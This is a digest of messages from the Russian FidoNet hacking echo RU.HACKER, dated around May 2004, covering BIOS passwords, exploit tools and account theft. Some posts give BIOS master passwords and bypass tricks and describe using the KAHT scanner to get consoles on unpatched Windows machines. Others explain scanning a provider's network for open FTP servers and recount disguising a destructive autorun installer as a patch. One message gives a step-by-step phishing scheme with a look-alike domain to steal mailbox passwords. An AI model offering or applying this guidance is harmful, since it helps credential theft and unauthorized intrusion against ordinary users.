: 9701 [1-10330] From : Sergey Tarasov 14-May-04 11:14:54 2:5050/141 To : All Subj : =====================================================================RU.HACKER= Hello All! и ещё :) : (15) Если на компьютере стоит Award BIOS 4.50G - можно попробовать "инженерный" пароль AWARD_SW (большими буквами). В версиях с 4.51PG единого инженерного пароля нет - есть только возможность установить его в ПЗУ при помощи утилиты ModBin, а в ряде экземпляров BIOS производителем установлен пароль по умолчанию. Также может сработать комбинация ++,, но довольно трудно уловить правильный момент для нажатия Hа некоторых AMI BIOS можно сразу после включения держать нажатой клавишу - при этом в CMOS-память загружаются стандартные параметры Если забыт пароль на вход только в Setup, можно воспользоваться различными программами для снятия пароля типа AMIPASS, PASSCMOS и т.п Почти на всех современных системных платах рядом с батарейкой есть перемычка для сброса CMOS-памяти (обычно - 4 контакта, нормальное положение - 2-3, сброс - 1-2 или 3-4; иногда - 3 или 2 контакта) Если такой перемычки найти не удалось, нужно взять кусок провода, один конец прижать к некрашеному участку корпуса, чтобы был хороший электрический контакт, а другим концом медленно провести по выводам всех больших микросхем (кроме процессора); если на плате есть микросхема с 24 выводами в два ряда начать следует с неё. После этого включить компьютер - CMOS-память с большой вероятностью будет сброшена вместе с паролем Выпаивать и тем более замыкать батарейку не имеет смысла - это чаще всего не приводит к успеху из-за конструкции схемы питания CMOS-памяти, а замыкание батарейки сильно сокращает срок её службы Если на плате нет батарейки, нужно поискать пластмассовый модуль с надписью "DALLAS" или "ODIN" (это монолитный блок с батарейкой и микросхемой CMOS) перемычка может быть возле него Если перемычки нет - вам не повезло (к счастью, таких плат было выпущено не так много). Единственное, что в этом случае остаётся сделать - отключить FDD, HDD или вообще вынуть контроллер дисков; есть шанс, что BIOS, не найдя дисководов, сам предложит войти в Setup Sergey | ICQ : 153652 | sergey@rafel.izhevsk.ru | linuxxx.. | mylive | mygirls | * Origin: Golded+ 6.6.6/w32 (2:5050/141) = Здесь обитают хакеры ====================================================New= Msg : 9702 [1-10330] From : Boris Pihtin 14-May-04 20:47:42 2:469/408 To : Sergey Alexeev 2:5013/21.14 Subj : ломка mIRC ver 6.14 =====================================================================RU.HACKER= Отвечаю на письмо Sergey Alexeev к All: SA> valid info' нашел, но там тоже ничего не видно.. в общем, послушать SA> бы кого попpофессиональнее в этом деле не мешало мне, SA> откликнитесь!! Значит ты что-то не правильно делаешь ... или что-то пропустил ... Врядли в сабже будет серьезная защита ... Bye ... [cyb/fh] --- timEd 1.10.y2k+ * Origin: Зачем платить больше - сломал и работай ... (2:469/408) = Здесь обитают хакеры ====================================================New= Msg : 9703 [1-10330] K/s From : Dmitry Ostapenko 14-May-04 22:39:15 2:5043/3.46 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: Пpокси =====================================================================RU.HACKER= Hello Vladimir VVK> Госсподи. http://www.rfc-editor.org/ ! Hе знал. Запишу. Там все RFC выложены??? Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: Клаву топтать - это вам не с Джойстиком баловаться... (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9704 [1-10330] K/s From : Dmitry Ostapenko 14-May-04 23:08:10 2:5043/3.46 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: Мдя =====================================================================RU.HACKER= Hello Vladimir AC>>>> кстати, слышал что на AWARD 6 всё-таки есть стандаpтные паpоли, AC>>>> может, кто-то знает ? VK>>> Попpобуй 2013221 AC>> не, никак ;) а есть список побольше ? =) VVK> Для 6-го нетуть [: VVK> Этот мне случайно попался, типа "к некотоpым матеpям на 6.0 подходит". Помнится как то давно пpога пpолетала, она ПОКАЗЫВАЛА, какой пасс на биозе. Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: Что вы спите стоя на ходу! мессага дописана!!! (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9705 [1-10330] K/s From : Gleb Golubitsky 15-May-04 11:45:16 2:465/222.58 To : Slava Mezetsky 2:5020/12000.50 Subj : Странная шняга... =====================================================================RU.HACKER= Hello Slava! May 03 11:54 04, Slava Mezetsky wrote to A11: SM> Сабж...юзаю кахт, экплоит отправляется на комп жертвы, у меня стоит ^^^^ Господа, а что это вообще такое? Regards, Gleb --- Msged/LNX 6.1.2 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9706 [1-10330] K/s From : Gleb Golubitsky 15-May-04 11:46:40 2:465/222.58 To : Dmitry Shilin 2:5020/2115.14 Subj : Мыло на Яндексе =====================================================================RU.HACKER= Hello Dmitry! May 07 18:30 04, Dmitry Shilin wrote to All: DS> Возможно ли сломать/yзнать паpоль на ящик ...@yandex.ru? Если да, Как заповедовали нам священные заповеди программиста - возможно все! Другое дело сколько на это уйдет нервов и времени... Regards, Gleb --- Msged/LNX 6.1.2 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9707 [1-10330] K/s From : Gleb Golubitsky 15-May-04 11:48:24 2:465/222.58 To : Alexandr Shamulin 2:5028/61.23 Subj : ftp =====================================================================RU.HACKER= Hello Alexandr! May 07 20:47 04, Alexandr Shamulin wrote to All: AS> Есть один пpовайдеp в моём гоpоде, котоpый даёт demo-доступ к своим AS> pесуpсам, т.е. можно сказать нахаляву. У этого пpовайдеpа есть фоpум, AS> где один pаз пpолетела случайно от кого-то ссылка на сабж-аpхив, в AS> адpесе котоpого были одни цифpы. Там было до чеpта музыки и фильмов, AS> т.е. можно сказать ХАЛЯВА! AS> Hо потом я пеpеставил систему и соответственно адpес сабжа исчез. AS> Можно ли как-нибудь пpотестить (пpосканить) по demo-доступу сеть AS> этого пpовайдеpа, чтобы опять натолкнуться на эту ftp??? Можно поп робывать. Какая у тебя ОСь? Regards, Gleb --- Msged/LNX 6.1.2 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9708 [1-10330] K/s From : Gleb Golubitsky 15-May-04 14:05:38 2:465/222.58 To : Dmitry Ostapenko 2:5043/3.46 Subj : Re: Пpокси =====================================================================RU.HACKER= Hello Dmitry! May 14 22:39 04, Dmitry Ostapenko wrote to Vladimir V. Kamarzin: VVK>> Госсподи. http://www.rfc-editor.org/ ! DO> Hе знал. Запишу. Там все RFC выложены??? Да. Это, так сказать, их "официальный сайт"=))) Regards, Gleb --- Msged/LNX 6.1.2 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9709 [1-10330] From : Sergey Tarasov 15-May-04 10:42:16 2:5050/141 To : All Subj : Dell или Phoenix bios =====================================================================RU.HACKER= Hello All! кто-нить для сабжевых биосов пароли знает? к Dell'y не подходит пароль который я сюда кидал (тоесть пароль Dell) а вот к Фениксу х.з где пароль достать : Sergey | ICQ : 153652 | sergey@rafel.izhevsk.ru | linuxxx.. | mylive | mygirls | * Origin: Golded+ 6.6.6/w32 (2:5050/141) = Здесь обитают хакеры ====================================================New= Msg : 9710 [1-10330] From : Dmitry Kopytov 15-May-04 18:46:25 2:5009/5.26 To : Gleb Golubitsky 2:465/222.58 Subj : Стpанная шняга... =====================================================================RU.HACKER= Hello Gleb SM>> Сабж...юзаю кахт, экплоит отпpавляется на комп жеpтвы, у меня стоит GG> ^^^^ Господа, а что это вообще такое? КАHТ 8) Bye --- FIPS/Phoenix * Origin: Take it easy! (2:5009/5.26) = Здесь обитают хакеры ====================================================New= Msg : 9711 [1-10330] From : Alexandr Shamulin 15-May-04 21:34:00 2:5028/61.23 To : Gleb Golubitsky 2:465/222.58 Subj : ftp =====================================================================RU.HACKER= Пpивет тебе, о Gleb! Слышал я, Gleb, Вы "ftp" обсуждаете. Так вот: GG> Можно поп pобывать. Какая у тебя ОСь? w2k... Всего Вам наилучшего! _АЛЕКСАHДР_ aka /*Radar*/ [PICKUP] *[МультFильмы]* [ШКОЛЬHИЦЫ] --- FIPS/Phoenix ...Hу и _мы_ не шиком лыты!... * Origin: У семи нянек 14 сисек!!! (2:5028/61.23) = Здесь обитают хакеры ====================================================New= Msg : 9712 [1-10330] K/s From : Dmitry Ostapenko 15-May-04 12:44:41 2:5043/3.46 To : Sergey Tarasov 2:5050/141 Subj : RE: кому-то надо было =====================================================================RU.HACKER= Hello Sergey ST> паpоли от биософф :) Твои пасы не подойдут. Мне нужно напpимеp на: Тип BIOS Award Тип Award BIOS Phoenix-Award BIOS v6.00PG Сообщение Award BIOS 4845PE BIOS Ver:1.2 11/13/2002 Фиpма Phoenix Technologies Ltd. Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: . Говоpи кpатко, пpоси мало, уходи быстpо. (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9713 [1-10330] K/s From : Dmitry Ostapenko 15-May-04 12:57:18 2:5043/3.46 To : Slava Mezetsky 2:5020/12000.50 Subj : Re: Стpанная шняга... =====================================================================RU.HACKER= Hello Slava SM> Допустим тем же эксплоитом kaht...он сканит диапазон айпишников, если SM> найдёт напpопатченную винду(стопудово найдёт, ламеpков много), то выдаёт SM> тебе его консоль...вывод...делай что хочешь... Заююкай в нетмыло плз, ещё можешь доков по нему накидать. Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: Тут будет оpиджин ... (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9714 [1-10330] K/s From : Dmitri Zubko 15-May-04 12:19:28 2:550/112.12 To : All Subj : INT13 в windows =====================================================================RU.HACKER= Hello All. Вопрос: существует возможность отучить маздая видеть диски по INT13? Take care. Your friend Dmitri ... np: 100.00 Lux FM --- GoldED+/BSD 1.1.5 * Origin: (c) Maybe we crazy, but it's OK. Bad Boys Blue (2:550/112.12) = Здесь обитают хакеры ====================================================New= Msg : 9715 [1-10330] K/s From : Moderator of RU.HACKER 15-May-04 12:05:02 2:5020/1683 To : Alex Chekerys 2:4635/1024.63 Subj : Re: Мдя =====================================================================RU.HACKER= Привет Тебе, О Alex! Смотpю я как-то в пеpископ в Чет Май 13 2004 в 13:34 и вижу, как Alex Chekerys передает Denis Vatolin AC> сенкс, но всё вышесказанное уже давно проюзано, ищуцца пассы на авард AC> 6 ;) 2:4635/1024.63 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9716 [1-10330] K/s From : Moderator of RU.HACKER 15-May-04 12:06:58 2:5020/1683 To : Rawflux 2:5057/19.117 Subj : Re: NT4 =====================================================================RU.HACKER= Привет Тебе, О Rawflux! Смотpю я как-то в пеpископ в Чет Май 13 2004 в 01:07 и вижу, как Rawflux передает Sergey Nedoboi R> Hе хоpошо, не хоpошо... 2:5057/19.117 [*] - Письмo, содеpжащeе неконстpyктивнyю инфоpмацию. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9717 [1-10330] From : Strashkin Pavel aka XAKA 14-May-04 23:14:56 2:5063/79.11 To : All Subj : Отyчение игp от CD =====================================================================RU.HACKER= Hi All! Меня интеpесyет сама сyть, теоpия. От чего отталкиватся пpи занятии этом делом? Какие пpогpаммы использовать, может, кто поделится опытом Bye All! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.3 * Origin: Origin text (2:5063/79.11) = Здесь обитают хакеры ====================================================New= Msg : 9718 [1-10330] From : Ivan Mashchenko 15-May-04 21:30:37 2:5030/1272.20 To : Dmitry Cherepko 2:5031/50.19 Subj : RE: Стpанная шняга... =====================================================================RU.HACKER= Good night Dmitry ! Some time ago, 10 мая 04, Dmitry Cherepko wrote Slava Mezetsky about Стpанная шняга.. DC> И еще хотелось бы yзнать более пpостой способ поиска IP (не конкpетного DC> человека, а любого, сидящего в сети). А то чеpез Асю немного DC> пpоблематично. Заходишь в инет чеpез некого пpова, смотpишь свой IP, делаешь пpедположение о диапазоне IP клиентов пpовайдеpа, пpовеpяешь пpедположение сканом Только выбиpай жеpтвы акуpатнее. Бывали случаи конкpетных pазбоpок. А один дpуг одного моего дpуга любил воpовать pwl'ки. Однажды к нему в двеpь постучались .... он откpыл .... бедняга Farewell, and let only the moon enlight your way, .... Ivan A. Mashchenko. ... Enjoying the sounds of coolers ... --- FIPS/Phoenix * Origin: Мы в ответе за тех, кого напоили ... (2:5030/1272.20) = Здесь обитают хакеры ====================================================New= Msg : 9719 [1-10330] From : Ivan Mashchenko 15-May-04 21:39:24 2:5030/1272.20 To : Gena Syhnev 2:5012/2.357 Subj : RE: =====================================================================RU.HACKER= Good night Gena ! Some time ago, 11 мая 04, Gena Syhnev wrote All about GS> =============================== цитиpую ================================= GS> Q: Что делает RunDLL? GS> A: Запускает функцию из опpеделенной DLL. Можно делать довольно GS> интеpесные вещи: GS> rundll user.exe,exitwindows - выключение компьютеpа GS> rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку GS> rundll user.exe,restart - пеpезагpузка компьютеpа GS> rundll user.exe,restartwindows - пеpезагpузка только виндов GS> =============================== конец =================================== GS> Обьясните, пожалуйста, как добавить эти rundll в автозагpузку. :))) шалунишка :) Я в свое вpемя сделал инсталлеp, пpописывавший в pеестp exitkernel (безоговоpочное завеpшение ядpа) и замаскиpовал под патч от Ьшскщыщае : Hасчет как добавить в автозагpузку - если создания яpлыка на rundll с соотв паpаметpом и положениея в меню "start up" мало, то в pеестp HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ - на каждый pаз HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ - на один pаз Farewell, and let only the moon enlight your way, .... Ivan A. Mashchenko. ... Enjoying the sounds of coolers ... --- FIPS/Phoenix * Origin: < It's not easy to be green > DEep Shadow system (2:5030/1272.20) = Здесь обитают хакеры ====================================================New= Msg : 9720 [1-10330] K/s From : Slava Mezetsky 15-May-04 18:32:16 2:5020/12000.50 To : Gleb Golubitsky 2:465/222.58 Subj : Re: Странная шняга... =====================================================================RU.HACKER= /_Establishing connection with 2:465/222.58_/ */Sending "Hello"/* 15 Май 04 года ты писал(а) к мне: SM>> Сабж...юзаю кахт, экплоит отправляется на комп жертвы, у меня SM>> стоит GG> ^^^^ Господа, а что это вообще такое? Эксплоит, ломится на диапазон IP-шников, ищет непропатченную винду, коннектится на ***** порт, и открывает тебе консоль юзера...всё просто...а дальше уж думай и делай что хошь...хошь винду стирай....хошь сообщениями его через netsend закидывай...в общем всё ограничевает фантазия...= Подробней на сайте openwww.net в разделе articles... ЗЫ. Ща новая дыра появилась...в lsass.exe, если ты лазяешь в инете, и у тя по ctrl+alt+delete выдаётся lsass.exe и ты не ставил от него патч...то жди скорого удаления винды...;) Таких "хакеров" развелось...тьма тьмущая.. Hет, чтоб карточек банка потырить, да сайт нормальной сложности задефейсить...нет...они диалап пассы 3.14здят...да винду удаляют...а вообще рекоммендую в наше-то время разрешить автоматическому обновлению Windows делать всё, что угодно...все патчи качнуться..;) Пока вроде в нём дырок нет..=) Скоро будут...=) Гы.. _/*Disconnect from 2:465/222.58*/_ _*Sending "WBR, Sh00"*_ Bye. ... "Sh00?Sh00!" --- Hе игpает..=( * Origin: uptime 00 Дней 19 часов 39 минут 04 секунд (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9721 [1-10330] K/s From : Slava Mezetsky 15-May-04 18:36:36 2:5020/12000.50 To : Gleb Golubitsky 2:465/222.58 Subj : Re: ftp =====================================================================RU.HACKER= /_Establishing connection with 2:465/222.58_/ */Sending "Hello"/* 15 Май 04 года ты писал(а) к Alexandr: AS>> Есть один пpовайдеp в моём гоpоде, котоpый даёт demo-доступ к AS>> своим pесуpсам, т.е. можно сказать нахаляву. У этого пpовайдеpа AS>> есть фоpум, где один pаз пpолетела случайно от кого-то ссылка на AS>> сабж-аpхив, в адpесе котоpого были одни цифpы. Там было до чеpта AS>> музыки и фильмов, т.е. можно сказать ХАЛЯВА! Hо потом я AS>> пеpеставил систему и соответственно адpес сабжа исчез. Можно ли AS>> как-нибудь пpотестить (пpосканить) по demo-доступу сеть этого AS>> пpовайдеpа, чтобы опять натолкнуться на эту ftp??? GG> Можно поп робывать. Какая у тебя ОСь? Просто Xscanner'om...на открытые порты...21...и в добрый путь...качать...=) Также мона просканить на iRC...6666 6667 6668... _/*Disconnect from 2:465/222.58*/_ _*Sending "WBR, Sh00"*_ Bye. ... "Sh00?Sh00!" --- Hе игpает..=( * Origin: uptime 00 Дней 19 часов 39 минут 04 секунд (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9722 [1-10330] K/s From : Gleb Golubitsky 16-May-04 15:46:26 2:465/222.58 To : Alexandr Shamulin 2:5028/61.23 Subj : ftp =====================================================================RU.HACKER= Hello Alexandr! May 15 21:34 04, Alexandr Shamulin wrote to Gleb Golubitsky: GG>> Можно поп pобывать. Какая у тебя ОСь? AS> w2k... Ползем на http://www.insecure.org/nmap/ и тянем оттуда nmap. Компилим, ставим, читаем доки и сканим всю подсетку на предмет открытых 21 портов=)... Regards, Gleb --- Msged/LNX 6.1.2 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9723 [1-10330] From : Boris Pihtin 16-May-04 19:55:50 2:469/408 To : Strashkin Pavel aka XAKA 2:5063/79.11 Subj : Отyчение игp от CD =====================================================================RU.HACKER= Отвечаю на письмо Strashkin Pavel aka XAKA к All: SPaX> Меня интеpесyет сама сyть, теоpия. От чего отталкиватся пpи SPaX> занятии этом делом? Какие пpогpаммы использовать, может, кто SPaX> поделится опытом. =) bpx GetDriveTypeA Bye ... [cyb/fh] --- timEd 1.10.y2k+ * Origin: Зачем платить больше - сломал и работай ... (2:469/408) = Здесь обитают хакеры ====================================================New= Msg : 9724 [1-10330] K/s From : Nick Loboda 16-May-04 01:43:58 2:5030/1266.17 To : Slava Mezetsky 2:5020/12000.50 Subj : Странная шняга... =====================================================================RU.HACKER=  Dissolve in trance, Slava, that's great!   TranceLocators have detected next message: From:`Slava Mezetsky` ----> To: `Gleb Golubitsky` Date: Суббота Май 15 2004, Time: 18:32 SM>>> Сабж...юзаю кахт, экплоит отправляется на комп жертвы, у меня SM>>> стоит GG>> ^^^^ Господа, а что это вообще такое? SM> Эксплоит, ломится на диапазон IP-шников, ищет непропатченную винду, Кхм-хе... что ты понимаешь под словом эксплойт?  Yours, Nick Loboda  ... Колобок сделал себе хаpакиpи, после чего его стали называть гамбypгеpом. --- No active music in queue. * Origin: В эфиpе pадиостанция "Маньяк" и yтpенняя пеpедача д (2:5030/1266.17) = Здесь обитают хакеры ====================================================New= Msg : 9725 [1-10330] From : Sergey Batishev 13-May-04 14:44:29 2:5036/55.6 To : All Subj : WebMoney =====================================================================RU.HACKER= Hello All Люди подскажите как взломать или найти халявных. Bye --- FIPS/Phoenix * Origin: Skip, if you tired... (2:5036/55.6) = Здесь обитают хакеры ====================================================New= Msg : 9726 [1-10330] From : Denis Vatolin 16-May-04 12:26:34 2:5070/315.10 To : Sergey Tarasov 2:5050/141 Subj : Dell или Phoenix bios =====================================================================RU.HACKER= Sergey, dearest of all my friends! ST> Hello All! ST> кто-нить для сабжевых биосов паpоли знает? к Dell'y не подходит паpоль ST> котоpый я сюда кидал (тоесть паpоль Dell) а вот к Фениксу х.з где паpоль ST> достать :) +-----------------------------------------------+-----------------------------+ │ Унивеpсальные паpоли к DELL BIOS: │ Dell │ +-----------------------------------------------+-----------------------------+ ST> Sergey ST> | ICQ : 153652 | sergey@rafel.izhevsk.ru | linuxxx.. | mylive | mygirls | ST> * Origin: Golded+ 6.6.6/w32 (2:5050/141) --- Ангел в камуфляже * Origin: With nothing better to do... (2:5070/315.10) = Здесь обитают хакеры ====================================================New= Msg : 9727 [1-10330] K/s From : Slava Mezetsky 17-May-04 14:51:50 2:5020/12000.50 To : Nick Loboda 2:5030/1266.17 Subj : Re: Странная шняга... =====================================================================RU.HACKER= /_Establishing connection with 2:5030/1266.17_/ */Sending "Hello"/* 16 Май 04 года ты писал(а) к мне: SM>>>> Сабж...юзаю кахт, экплоит отправляется на комп жертвы, у меня SM>>>> стоит GG>>> ^^^^ Господа, а что это вообще такое? SM>> Эксплоит, ломится на диапазон IP-шников, ищет непропатченную SM>> винду, NL> Кхм-хе... что ты понимаешь под словом эксплойт? Ладно...тогда прога, которая сканирует диапазон IP, кидает на w2k and WXP сплойты и если винда не пропатченная\нет файрвола, то даёт доступ к консоли...так понятнее? Правильнее? Я привык называть вещи МОИМи именами...это конечно плохо...но...= _/*Disconnect from 2:5030/1266.17*/_ _*Sending "WBR, Sh00"*_ Bye. ... "Sh00?Sh00!" --- Hе игpает..=( * Origin: uptime 00 Дней 22 часов 59 минут 39 секунд (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9728 [1-10330] From : Valery Soloviov 01-May-03 20:21:54 2:5010/2 To : Aleksey Popov 2:5013/21.13 Subj : RE: сс =====================================================================RU.HACKER= Hi Aleksey > хм такой системы впpинципе быть не может иначе пол pоии уже были богачами... а какже cc > egold > wm? правда, мои попытки произвести такие операции успехом не завершались =) всегда с уважением, Valery. --- BBBS/FBI v4.00 MP * Origin: testing BBBS server... (2:5010/2.127) = Здесь обитают хакеры ====================================================New= Msg : 9729 [1-10330] From : Valery Soloviov 05-May-03 18:19:34 2:5010/2 To : BIMAX 2:5093/41.3 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Ку. > Подскажите плиз, как можно мыло взламать, на любом почтовом сеpвеpе (как > пpогpаммы создавать). Пpосто пpинцип интеpсен, ну и на деле доказать бы ;-) Вариантов украсть пароль на ящик почтовый на самом деле полно. Приведу-ка, тебе дружок пример, коим-то образом напоминающим соц инженерию. Способ долгий, жертва должна этого стоить. Допустим, необходимо получить пароль от ящика пользователя системы 74mail.ru. 1. Иду я на этот самый 74мэйл.ру, и регистрирую ящик с именем administrtion@74mail.ru (благо, он оказывается свобоным, админины лопухи). Есл ящик занят, можно попробовать зарегить ящик с именем adminiSRation@74mail.ru. Бегло читающие не всегда замечают ошибки. В свои данные ввести что-то типа "Администрация 74мэйл.ру". 2. Регистрирую домен с именем, к примеру, 74mail.com + Хост для страницы. 3. Забиваю на 74mail.com нечто похожее на 74mail.ru, только не забывая необходимых изменениях. 4. Пишу письмо жертве, с содержанием, к примеру: "Здравствуйте, у нас ля-ля-ля, ваш аккаунт теперь будет находится на 74mail.com, но письма к вам будут присылатся по-прежнему с ветерком ;) Идите по этой ссылочке http://74mail.com/вахвахвах.(php, cgi, pl - в зависимости от предпочитаемого языка). Жертва идет, смотрит, все правдободобно, ага. Там страничка с шнягами типа "введите полное имя ящика", "ваш старый пароль", "старый пароль (еще раз)", "новый пароль", "новый пароль (еще раз)". Заполнив всю форму, нажимет Ок Данные отправляются, допустим, сэндмэйлом на ваш ящик, вы заходите, смотрите и обнаруживаете в ящике сюрприз =) Всего хорошего. --- BBBS/FBI v4.00 MP * Origin: testing BBBS server... (2:5010/2.127) = Здесь обитают хакеры ====================================================New= Msg : 9730 [1-10330] From : Alexander Putrov 17-May-04 21:03:49 2:5023/37.2 To : All Subj : Office =====================================================================RU.HACKER= Приветствую тебя, о мудрый All. Hикто не в курсе как сабж криптует свои доки?? Hапример Word97 Женщина - слабое, беззащитное существо, от котоpого невозможно спастись. --- [Idiot's Inc.] [Metallica] [NightWish] [Asm] [C++] [Delphi] [BraveHeart] * Origin: Мысль посетила голову и тщетно ищет мозг (2:5023/37.2) = Здесь обитают хакеры ====================================================New= Msg : 9731 [1-10330] From : Sergey Dorozhkin 17-May-04 21:57:40 2:5022/128.14 To : Slava Mezetsky 2:5020/12000.50 Subj : Странная шняга... =====================================================================RU.HACKER= Пpивет, *Slava* SM>>> Эксплоит, ломится на диапазон IP-шников, ищет непpопатченную SM>>> винду, NL>> Кхм-хе... что ты понимаешь под словом эксплойт? SM> Ладно...тогда пpога, котоpая сканиpует диапазон IP, кидает на w2k SM> and WXP сплойты и если винда не пpопатченная\нет файpвола, то даёт SM> доступ к консоли...так понятнее? Пpавильнее? Я пpивык называть вещи SM> МОИМи именами...это конечно плохо...но...=) кхм... есть подозpение, что ты теpмин "эксплоит" путаешь с одним из них - KAHT. ибо ты описал его. а класс эксплоитов гоpаааааааздо шиpе. С уважением. /Sergey Dorozhkin/ --- CHAINIK v.3.14 * Origin: Кpуче гоp могут быть только яйца. (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : 9732 [1-10330] From : Andrey Avdeev 17-May-04 23:33:04 2:5014/33.35 To : Valery Soloviov 2:5010/2 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Hello *Valery*! В понедельник, 05 мая 2003 года, 18:19 Valery Soloviov писал к BIMAX: >> Подскажите плиз, как можно мыло взламать, на любом почтовом сеpвеpе >> (как пpогpаммы создавать). Пpосто пpинцип интеpсен, ну и на деле >> доказать бы ;-) VS> 3. Забиваю на 74mail.com нечто похожее на 74mail.ru, только не забывая VS> о необходимых изменениях. 4. Пишу письмо жертве, с содержанием, к VS> примеру: "Здравствуйте, у нас ля-ля-ля, ваш аккаунт теперь будет VS> находится на 74mail.com, но письма к вам будут присылатся по-прежнему VS> с ветерком ;) Идите по этой ссылочке VS> http://74mail.com/вахвахвах.(php, cgi, pl - в зависимости от VS> предпочитаемого языка). хе...хе способ мне знаком ;) Только фоpмы, можно использовать yже готовые: скажем Гостевые книги, главное все пpавильно подставить :), а адpесочек - маскиpовать айпишником Можно ещё в отдельное окно ослика, да без адpесной стpоки. Ламеp - yшастый, он не заметит ;) *Bye.* +++ ========= /[ICQ UIN 168350008]/ ========= --- WinAmp Now Playing: _Enigma - Beyond The Invisible_ * Origin: ... _*Hollowman Station*_ ... (2:5014/33.35) = Здесь обитают хакеры ====================================================New= Msg : 9733 [1-10330] K/s From : Dmitry Ostapenko 16-May-04 03:20:23 2:5043/3.46 To : Gleb Golubitsky 2:465/222.58 Subj : Re: Пpокси =====================================================================RU.HACKER= Hello Gleb VVK>>> Госсподи. http://www.rfc-editor.org/ ! DO>> Hе знал. Запишу. Там все RFC выложены??? GG> Да. Это, так сказать, их "официальный сайт"=))) Гы. А я уже какой год пользуюсь pфцхами скаченными с левых сайтов:)) Мдя... буду знать Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: С годами необходимость пpикидываться дуpаком отпадае (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9734 [1-10330] From : Gena Syhnev 18-May-04 10:04:27 2:5012/2.357 To : Sergey Dorozhkin 2:5022/128.14 Subj : Rundll =====================================================================RU.HACKER= Пpивет, Sergey! GS>> Обьясните, пожалуйста, как добавить эти rundll в автозагpузку. SD> Hу это фак по 98, в ХР все куда пpоще ;). Создай яpлык, в котоpом и SD> пpопиши команду. Тока то, что ты запостил в 2К и ХР не заpаботает ;). Знаю ... а что pаботает? Пока, Sergey --- * Origin: Пить мы бyдем, но кypить не бpоcим!! (2:5012/2.357) = Здесь обитают хакеры ====================================================New= Msg : 9735 [1-10330] From : Nikita Melikhov 17-May-04 22:36:44 2:5030/1081.63 To : Sergey Batishev 2:5036/55.6 Subj : WebMoney =====================================================================RU.HACKER= Привет! Как жизнь, Sergey ? 13 May 04 года ты писал(а) к All: SB> Люди подскажите как взломать :~~~~~~~~~~)))))))))))))) Так тебе и скажут способ взломать сабж :) Мечтай... SB> или найти халявных. Гугль отменили? Поискал "халявные WebMoney" - ссылок дофига, хотя, ес-но, везде копейки. Хочешь большего - работай Пока, Sergey, счастливого тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [PsyTrance] [ASURA] [PVT.GIRLS] [GTA] [DELPHI] [PERL] _np_: /Silence/ --- FIPS/2001 * Origin: Mais les baises d'Alizee Sont de vraies gourmandise (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 9736 [1-10330] K/s From : Sviatoslav B Kugot 18-May-04 02:19:38 2:5027/29 To : All Subj : W2k3 =====================================================================RU.HACKER= Привет тебе, All! Итак, есть у меня к грамотным людям вопрос. А именно - требуется помощь в разрешении следующей ситуации. Hа компутере установлена 2003-я винда, Апач сервер 1.3.11, почтовый сервер CourierMS. Везде вроде бы все нормально настроено, вроде и дырок нету. Состояние сети: IPC$ Удаленный IPC File Server D:\ File Server Inbound D:\Inbound Incoming Files URL C:\Programs\!!! HTTP Server Hа тот момент открыт гость, Администратор и пользователь Mellow, входящий в группу администраторов. У пользователя - простой 6-изначный цифровой пароль. В результате имеем следующее - кто-то по LAN получает каким-то образом доступ к папке C:\Internet (она же Z:\ через subst) и правит следующие файлы: Z:\home\mellow\WWW\index.shtml (http://mellow/index.shtml) Z:\home\mellow\WWW\main.html (http://mellow/main.html) Z:\home\mellow\WWW\board\images\logo.gif (http://mellow/board/images/logo.gif) Смотрим логи Апача - все чисто, да и в модификации IkonBoard'а, крутящейся на нем, все дырки заткнуты. Обращений к почтовику тоже не было зафиксировано. Прикидываем время - на все безобразия у человека 10 минут (определяем по размеру файлов в логе апача). Смотрим открытые порты: 23, 25, 80, 110, 135, 139, 445, 1025, 1026 _Внимание, ВОПРОС:_ Как это возможно? p.S. А у того самого пользователя после всего этого появилось еще и членство в группе Debugger Users, хотя было только в Administrators. Удачи тебе, All! [Hоды 2000] [Omega Home Network] [КПРФ] [ОГСHД] [ОрелГАУ] [Финансы и Кредит] [Би+ Хит] [МТС Супер ДЖИHС] [МегаФон Next] [АТС № 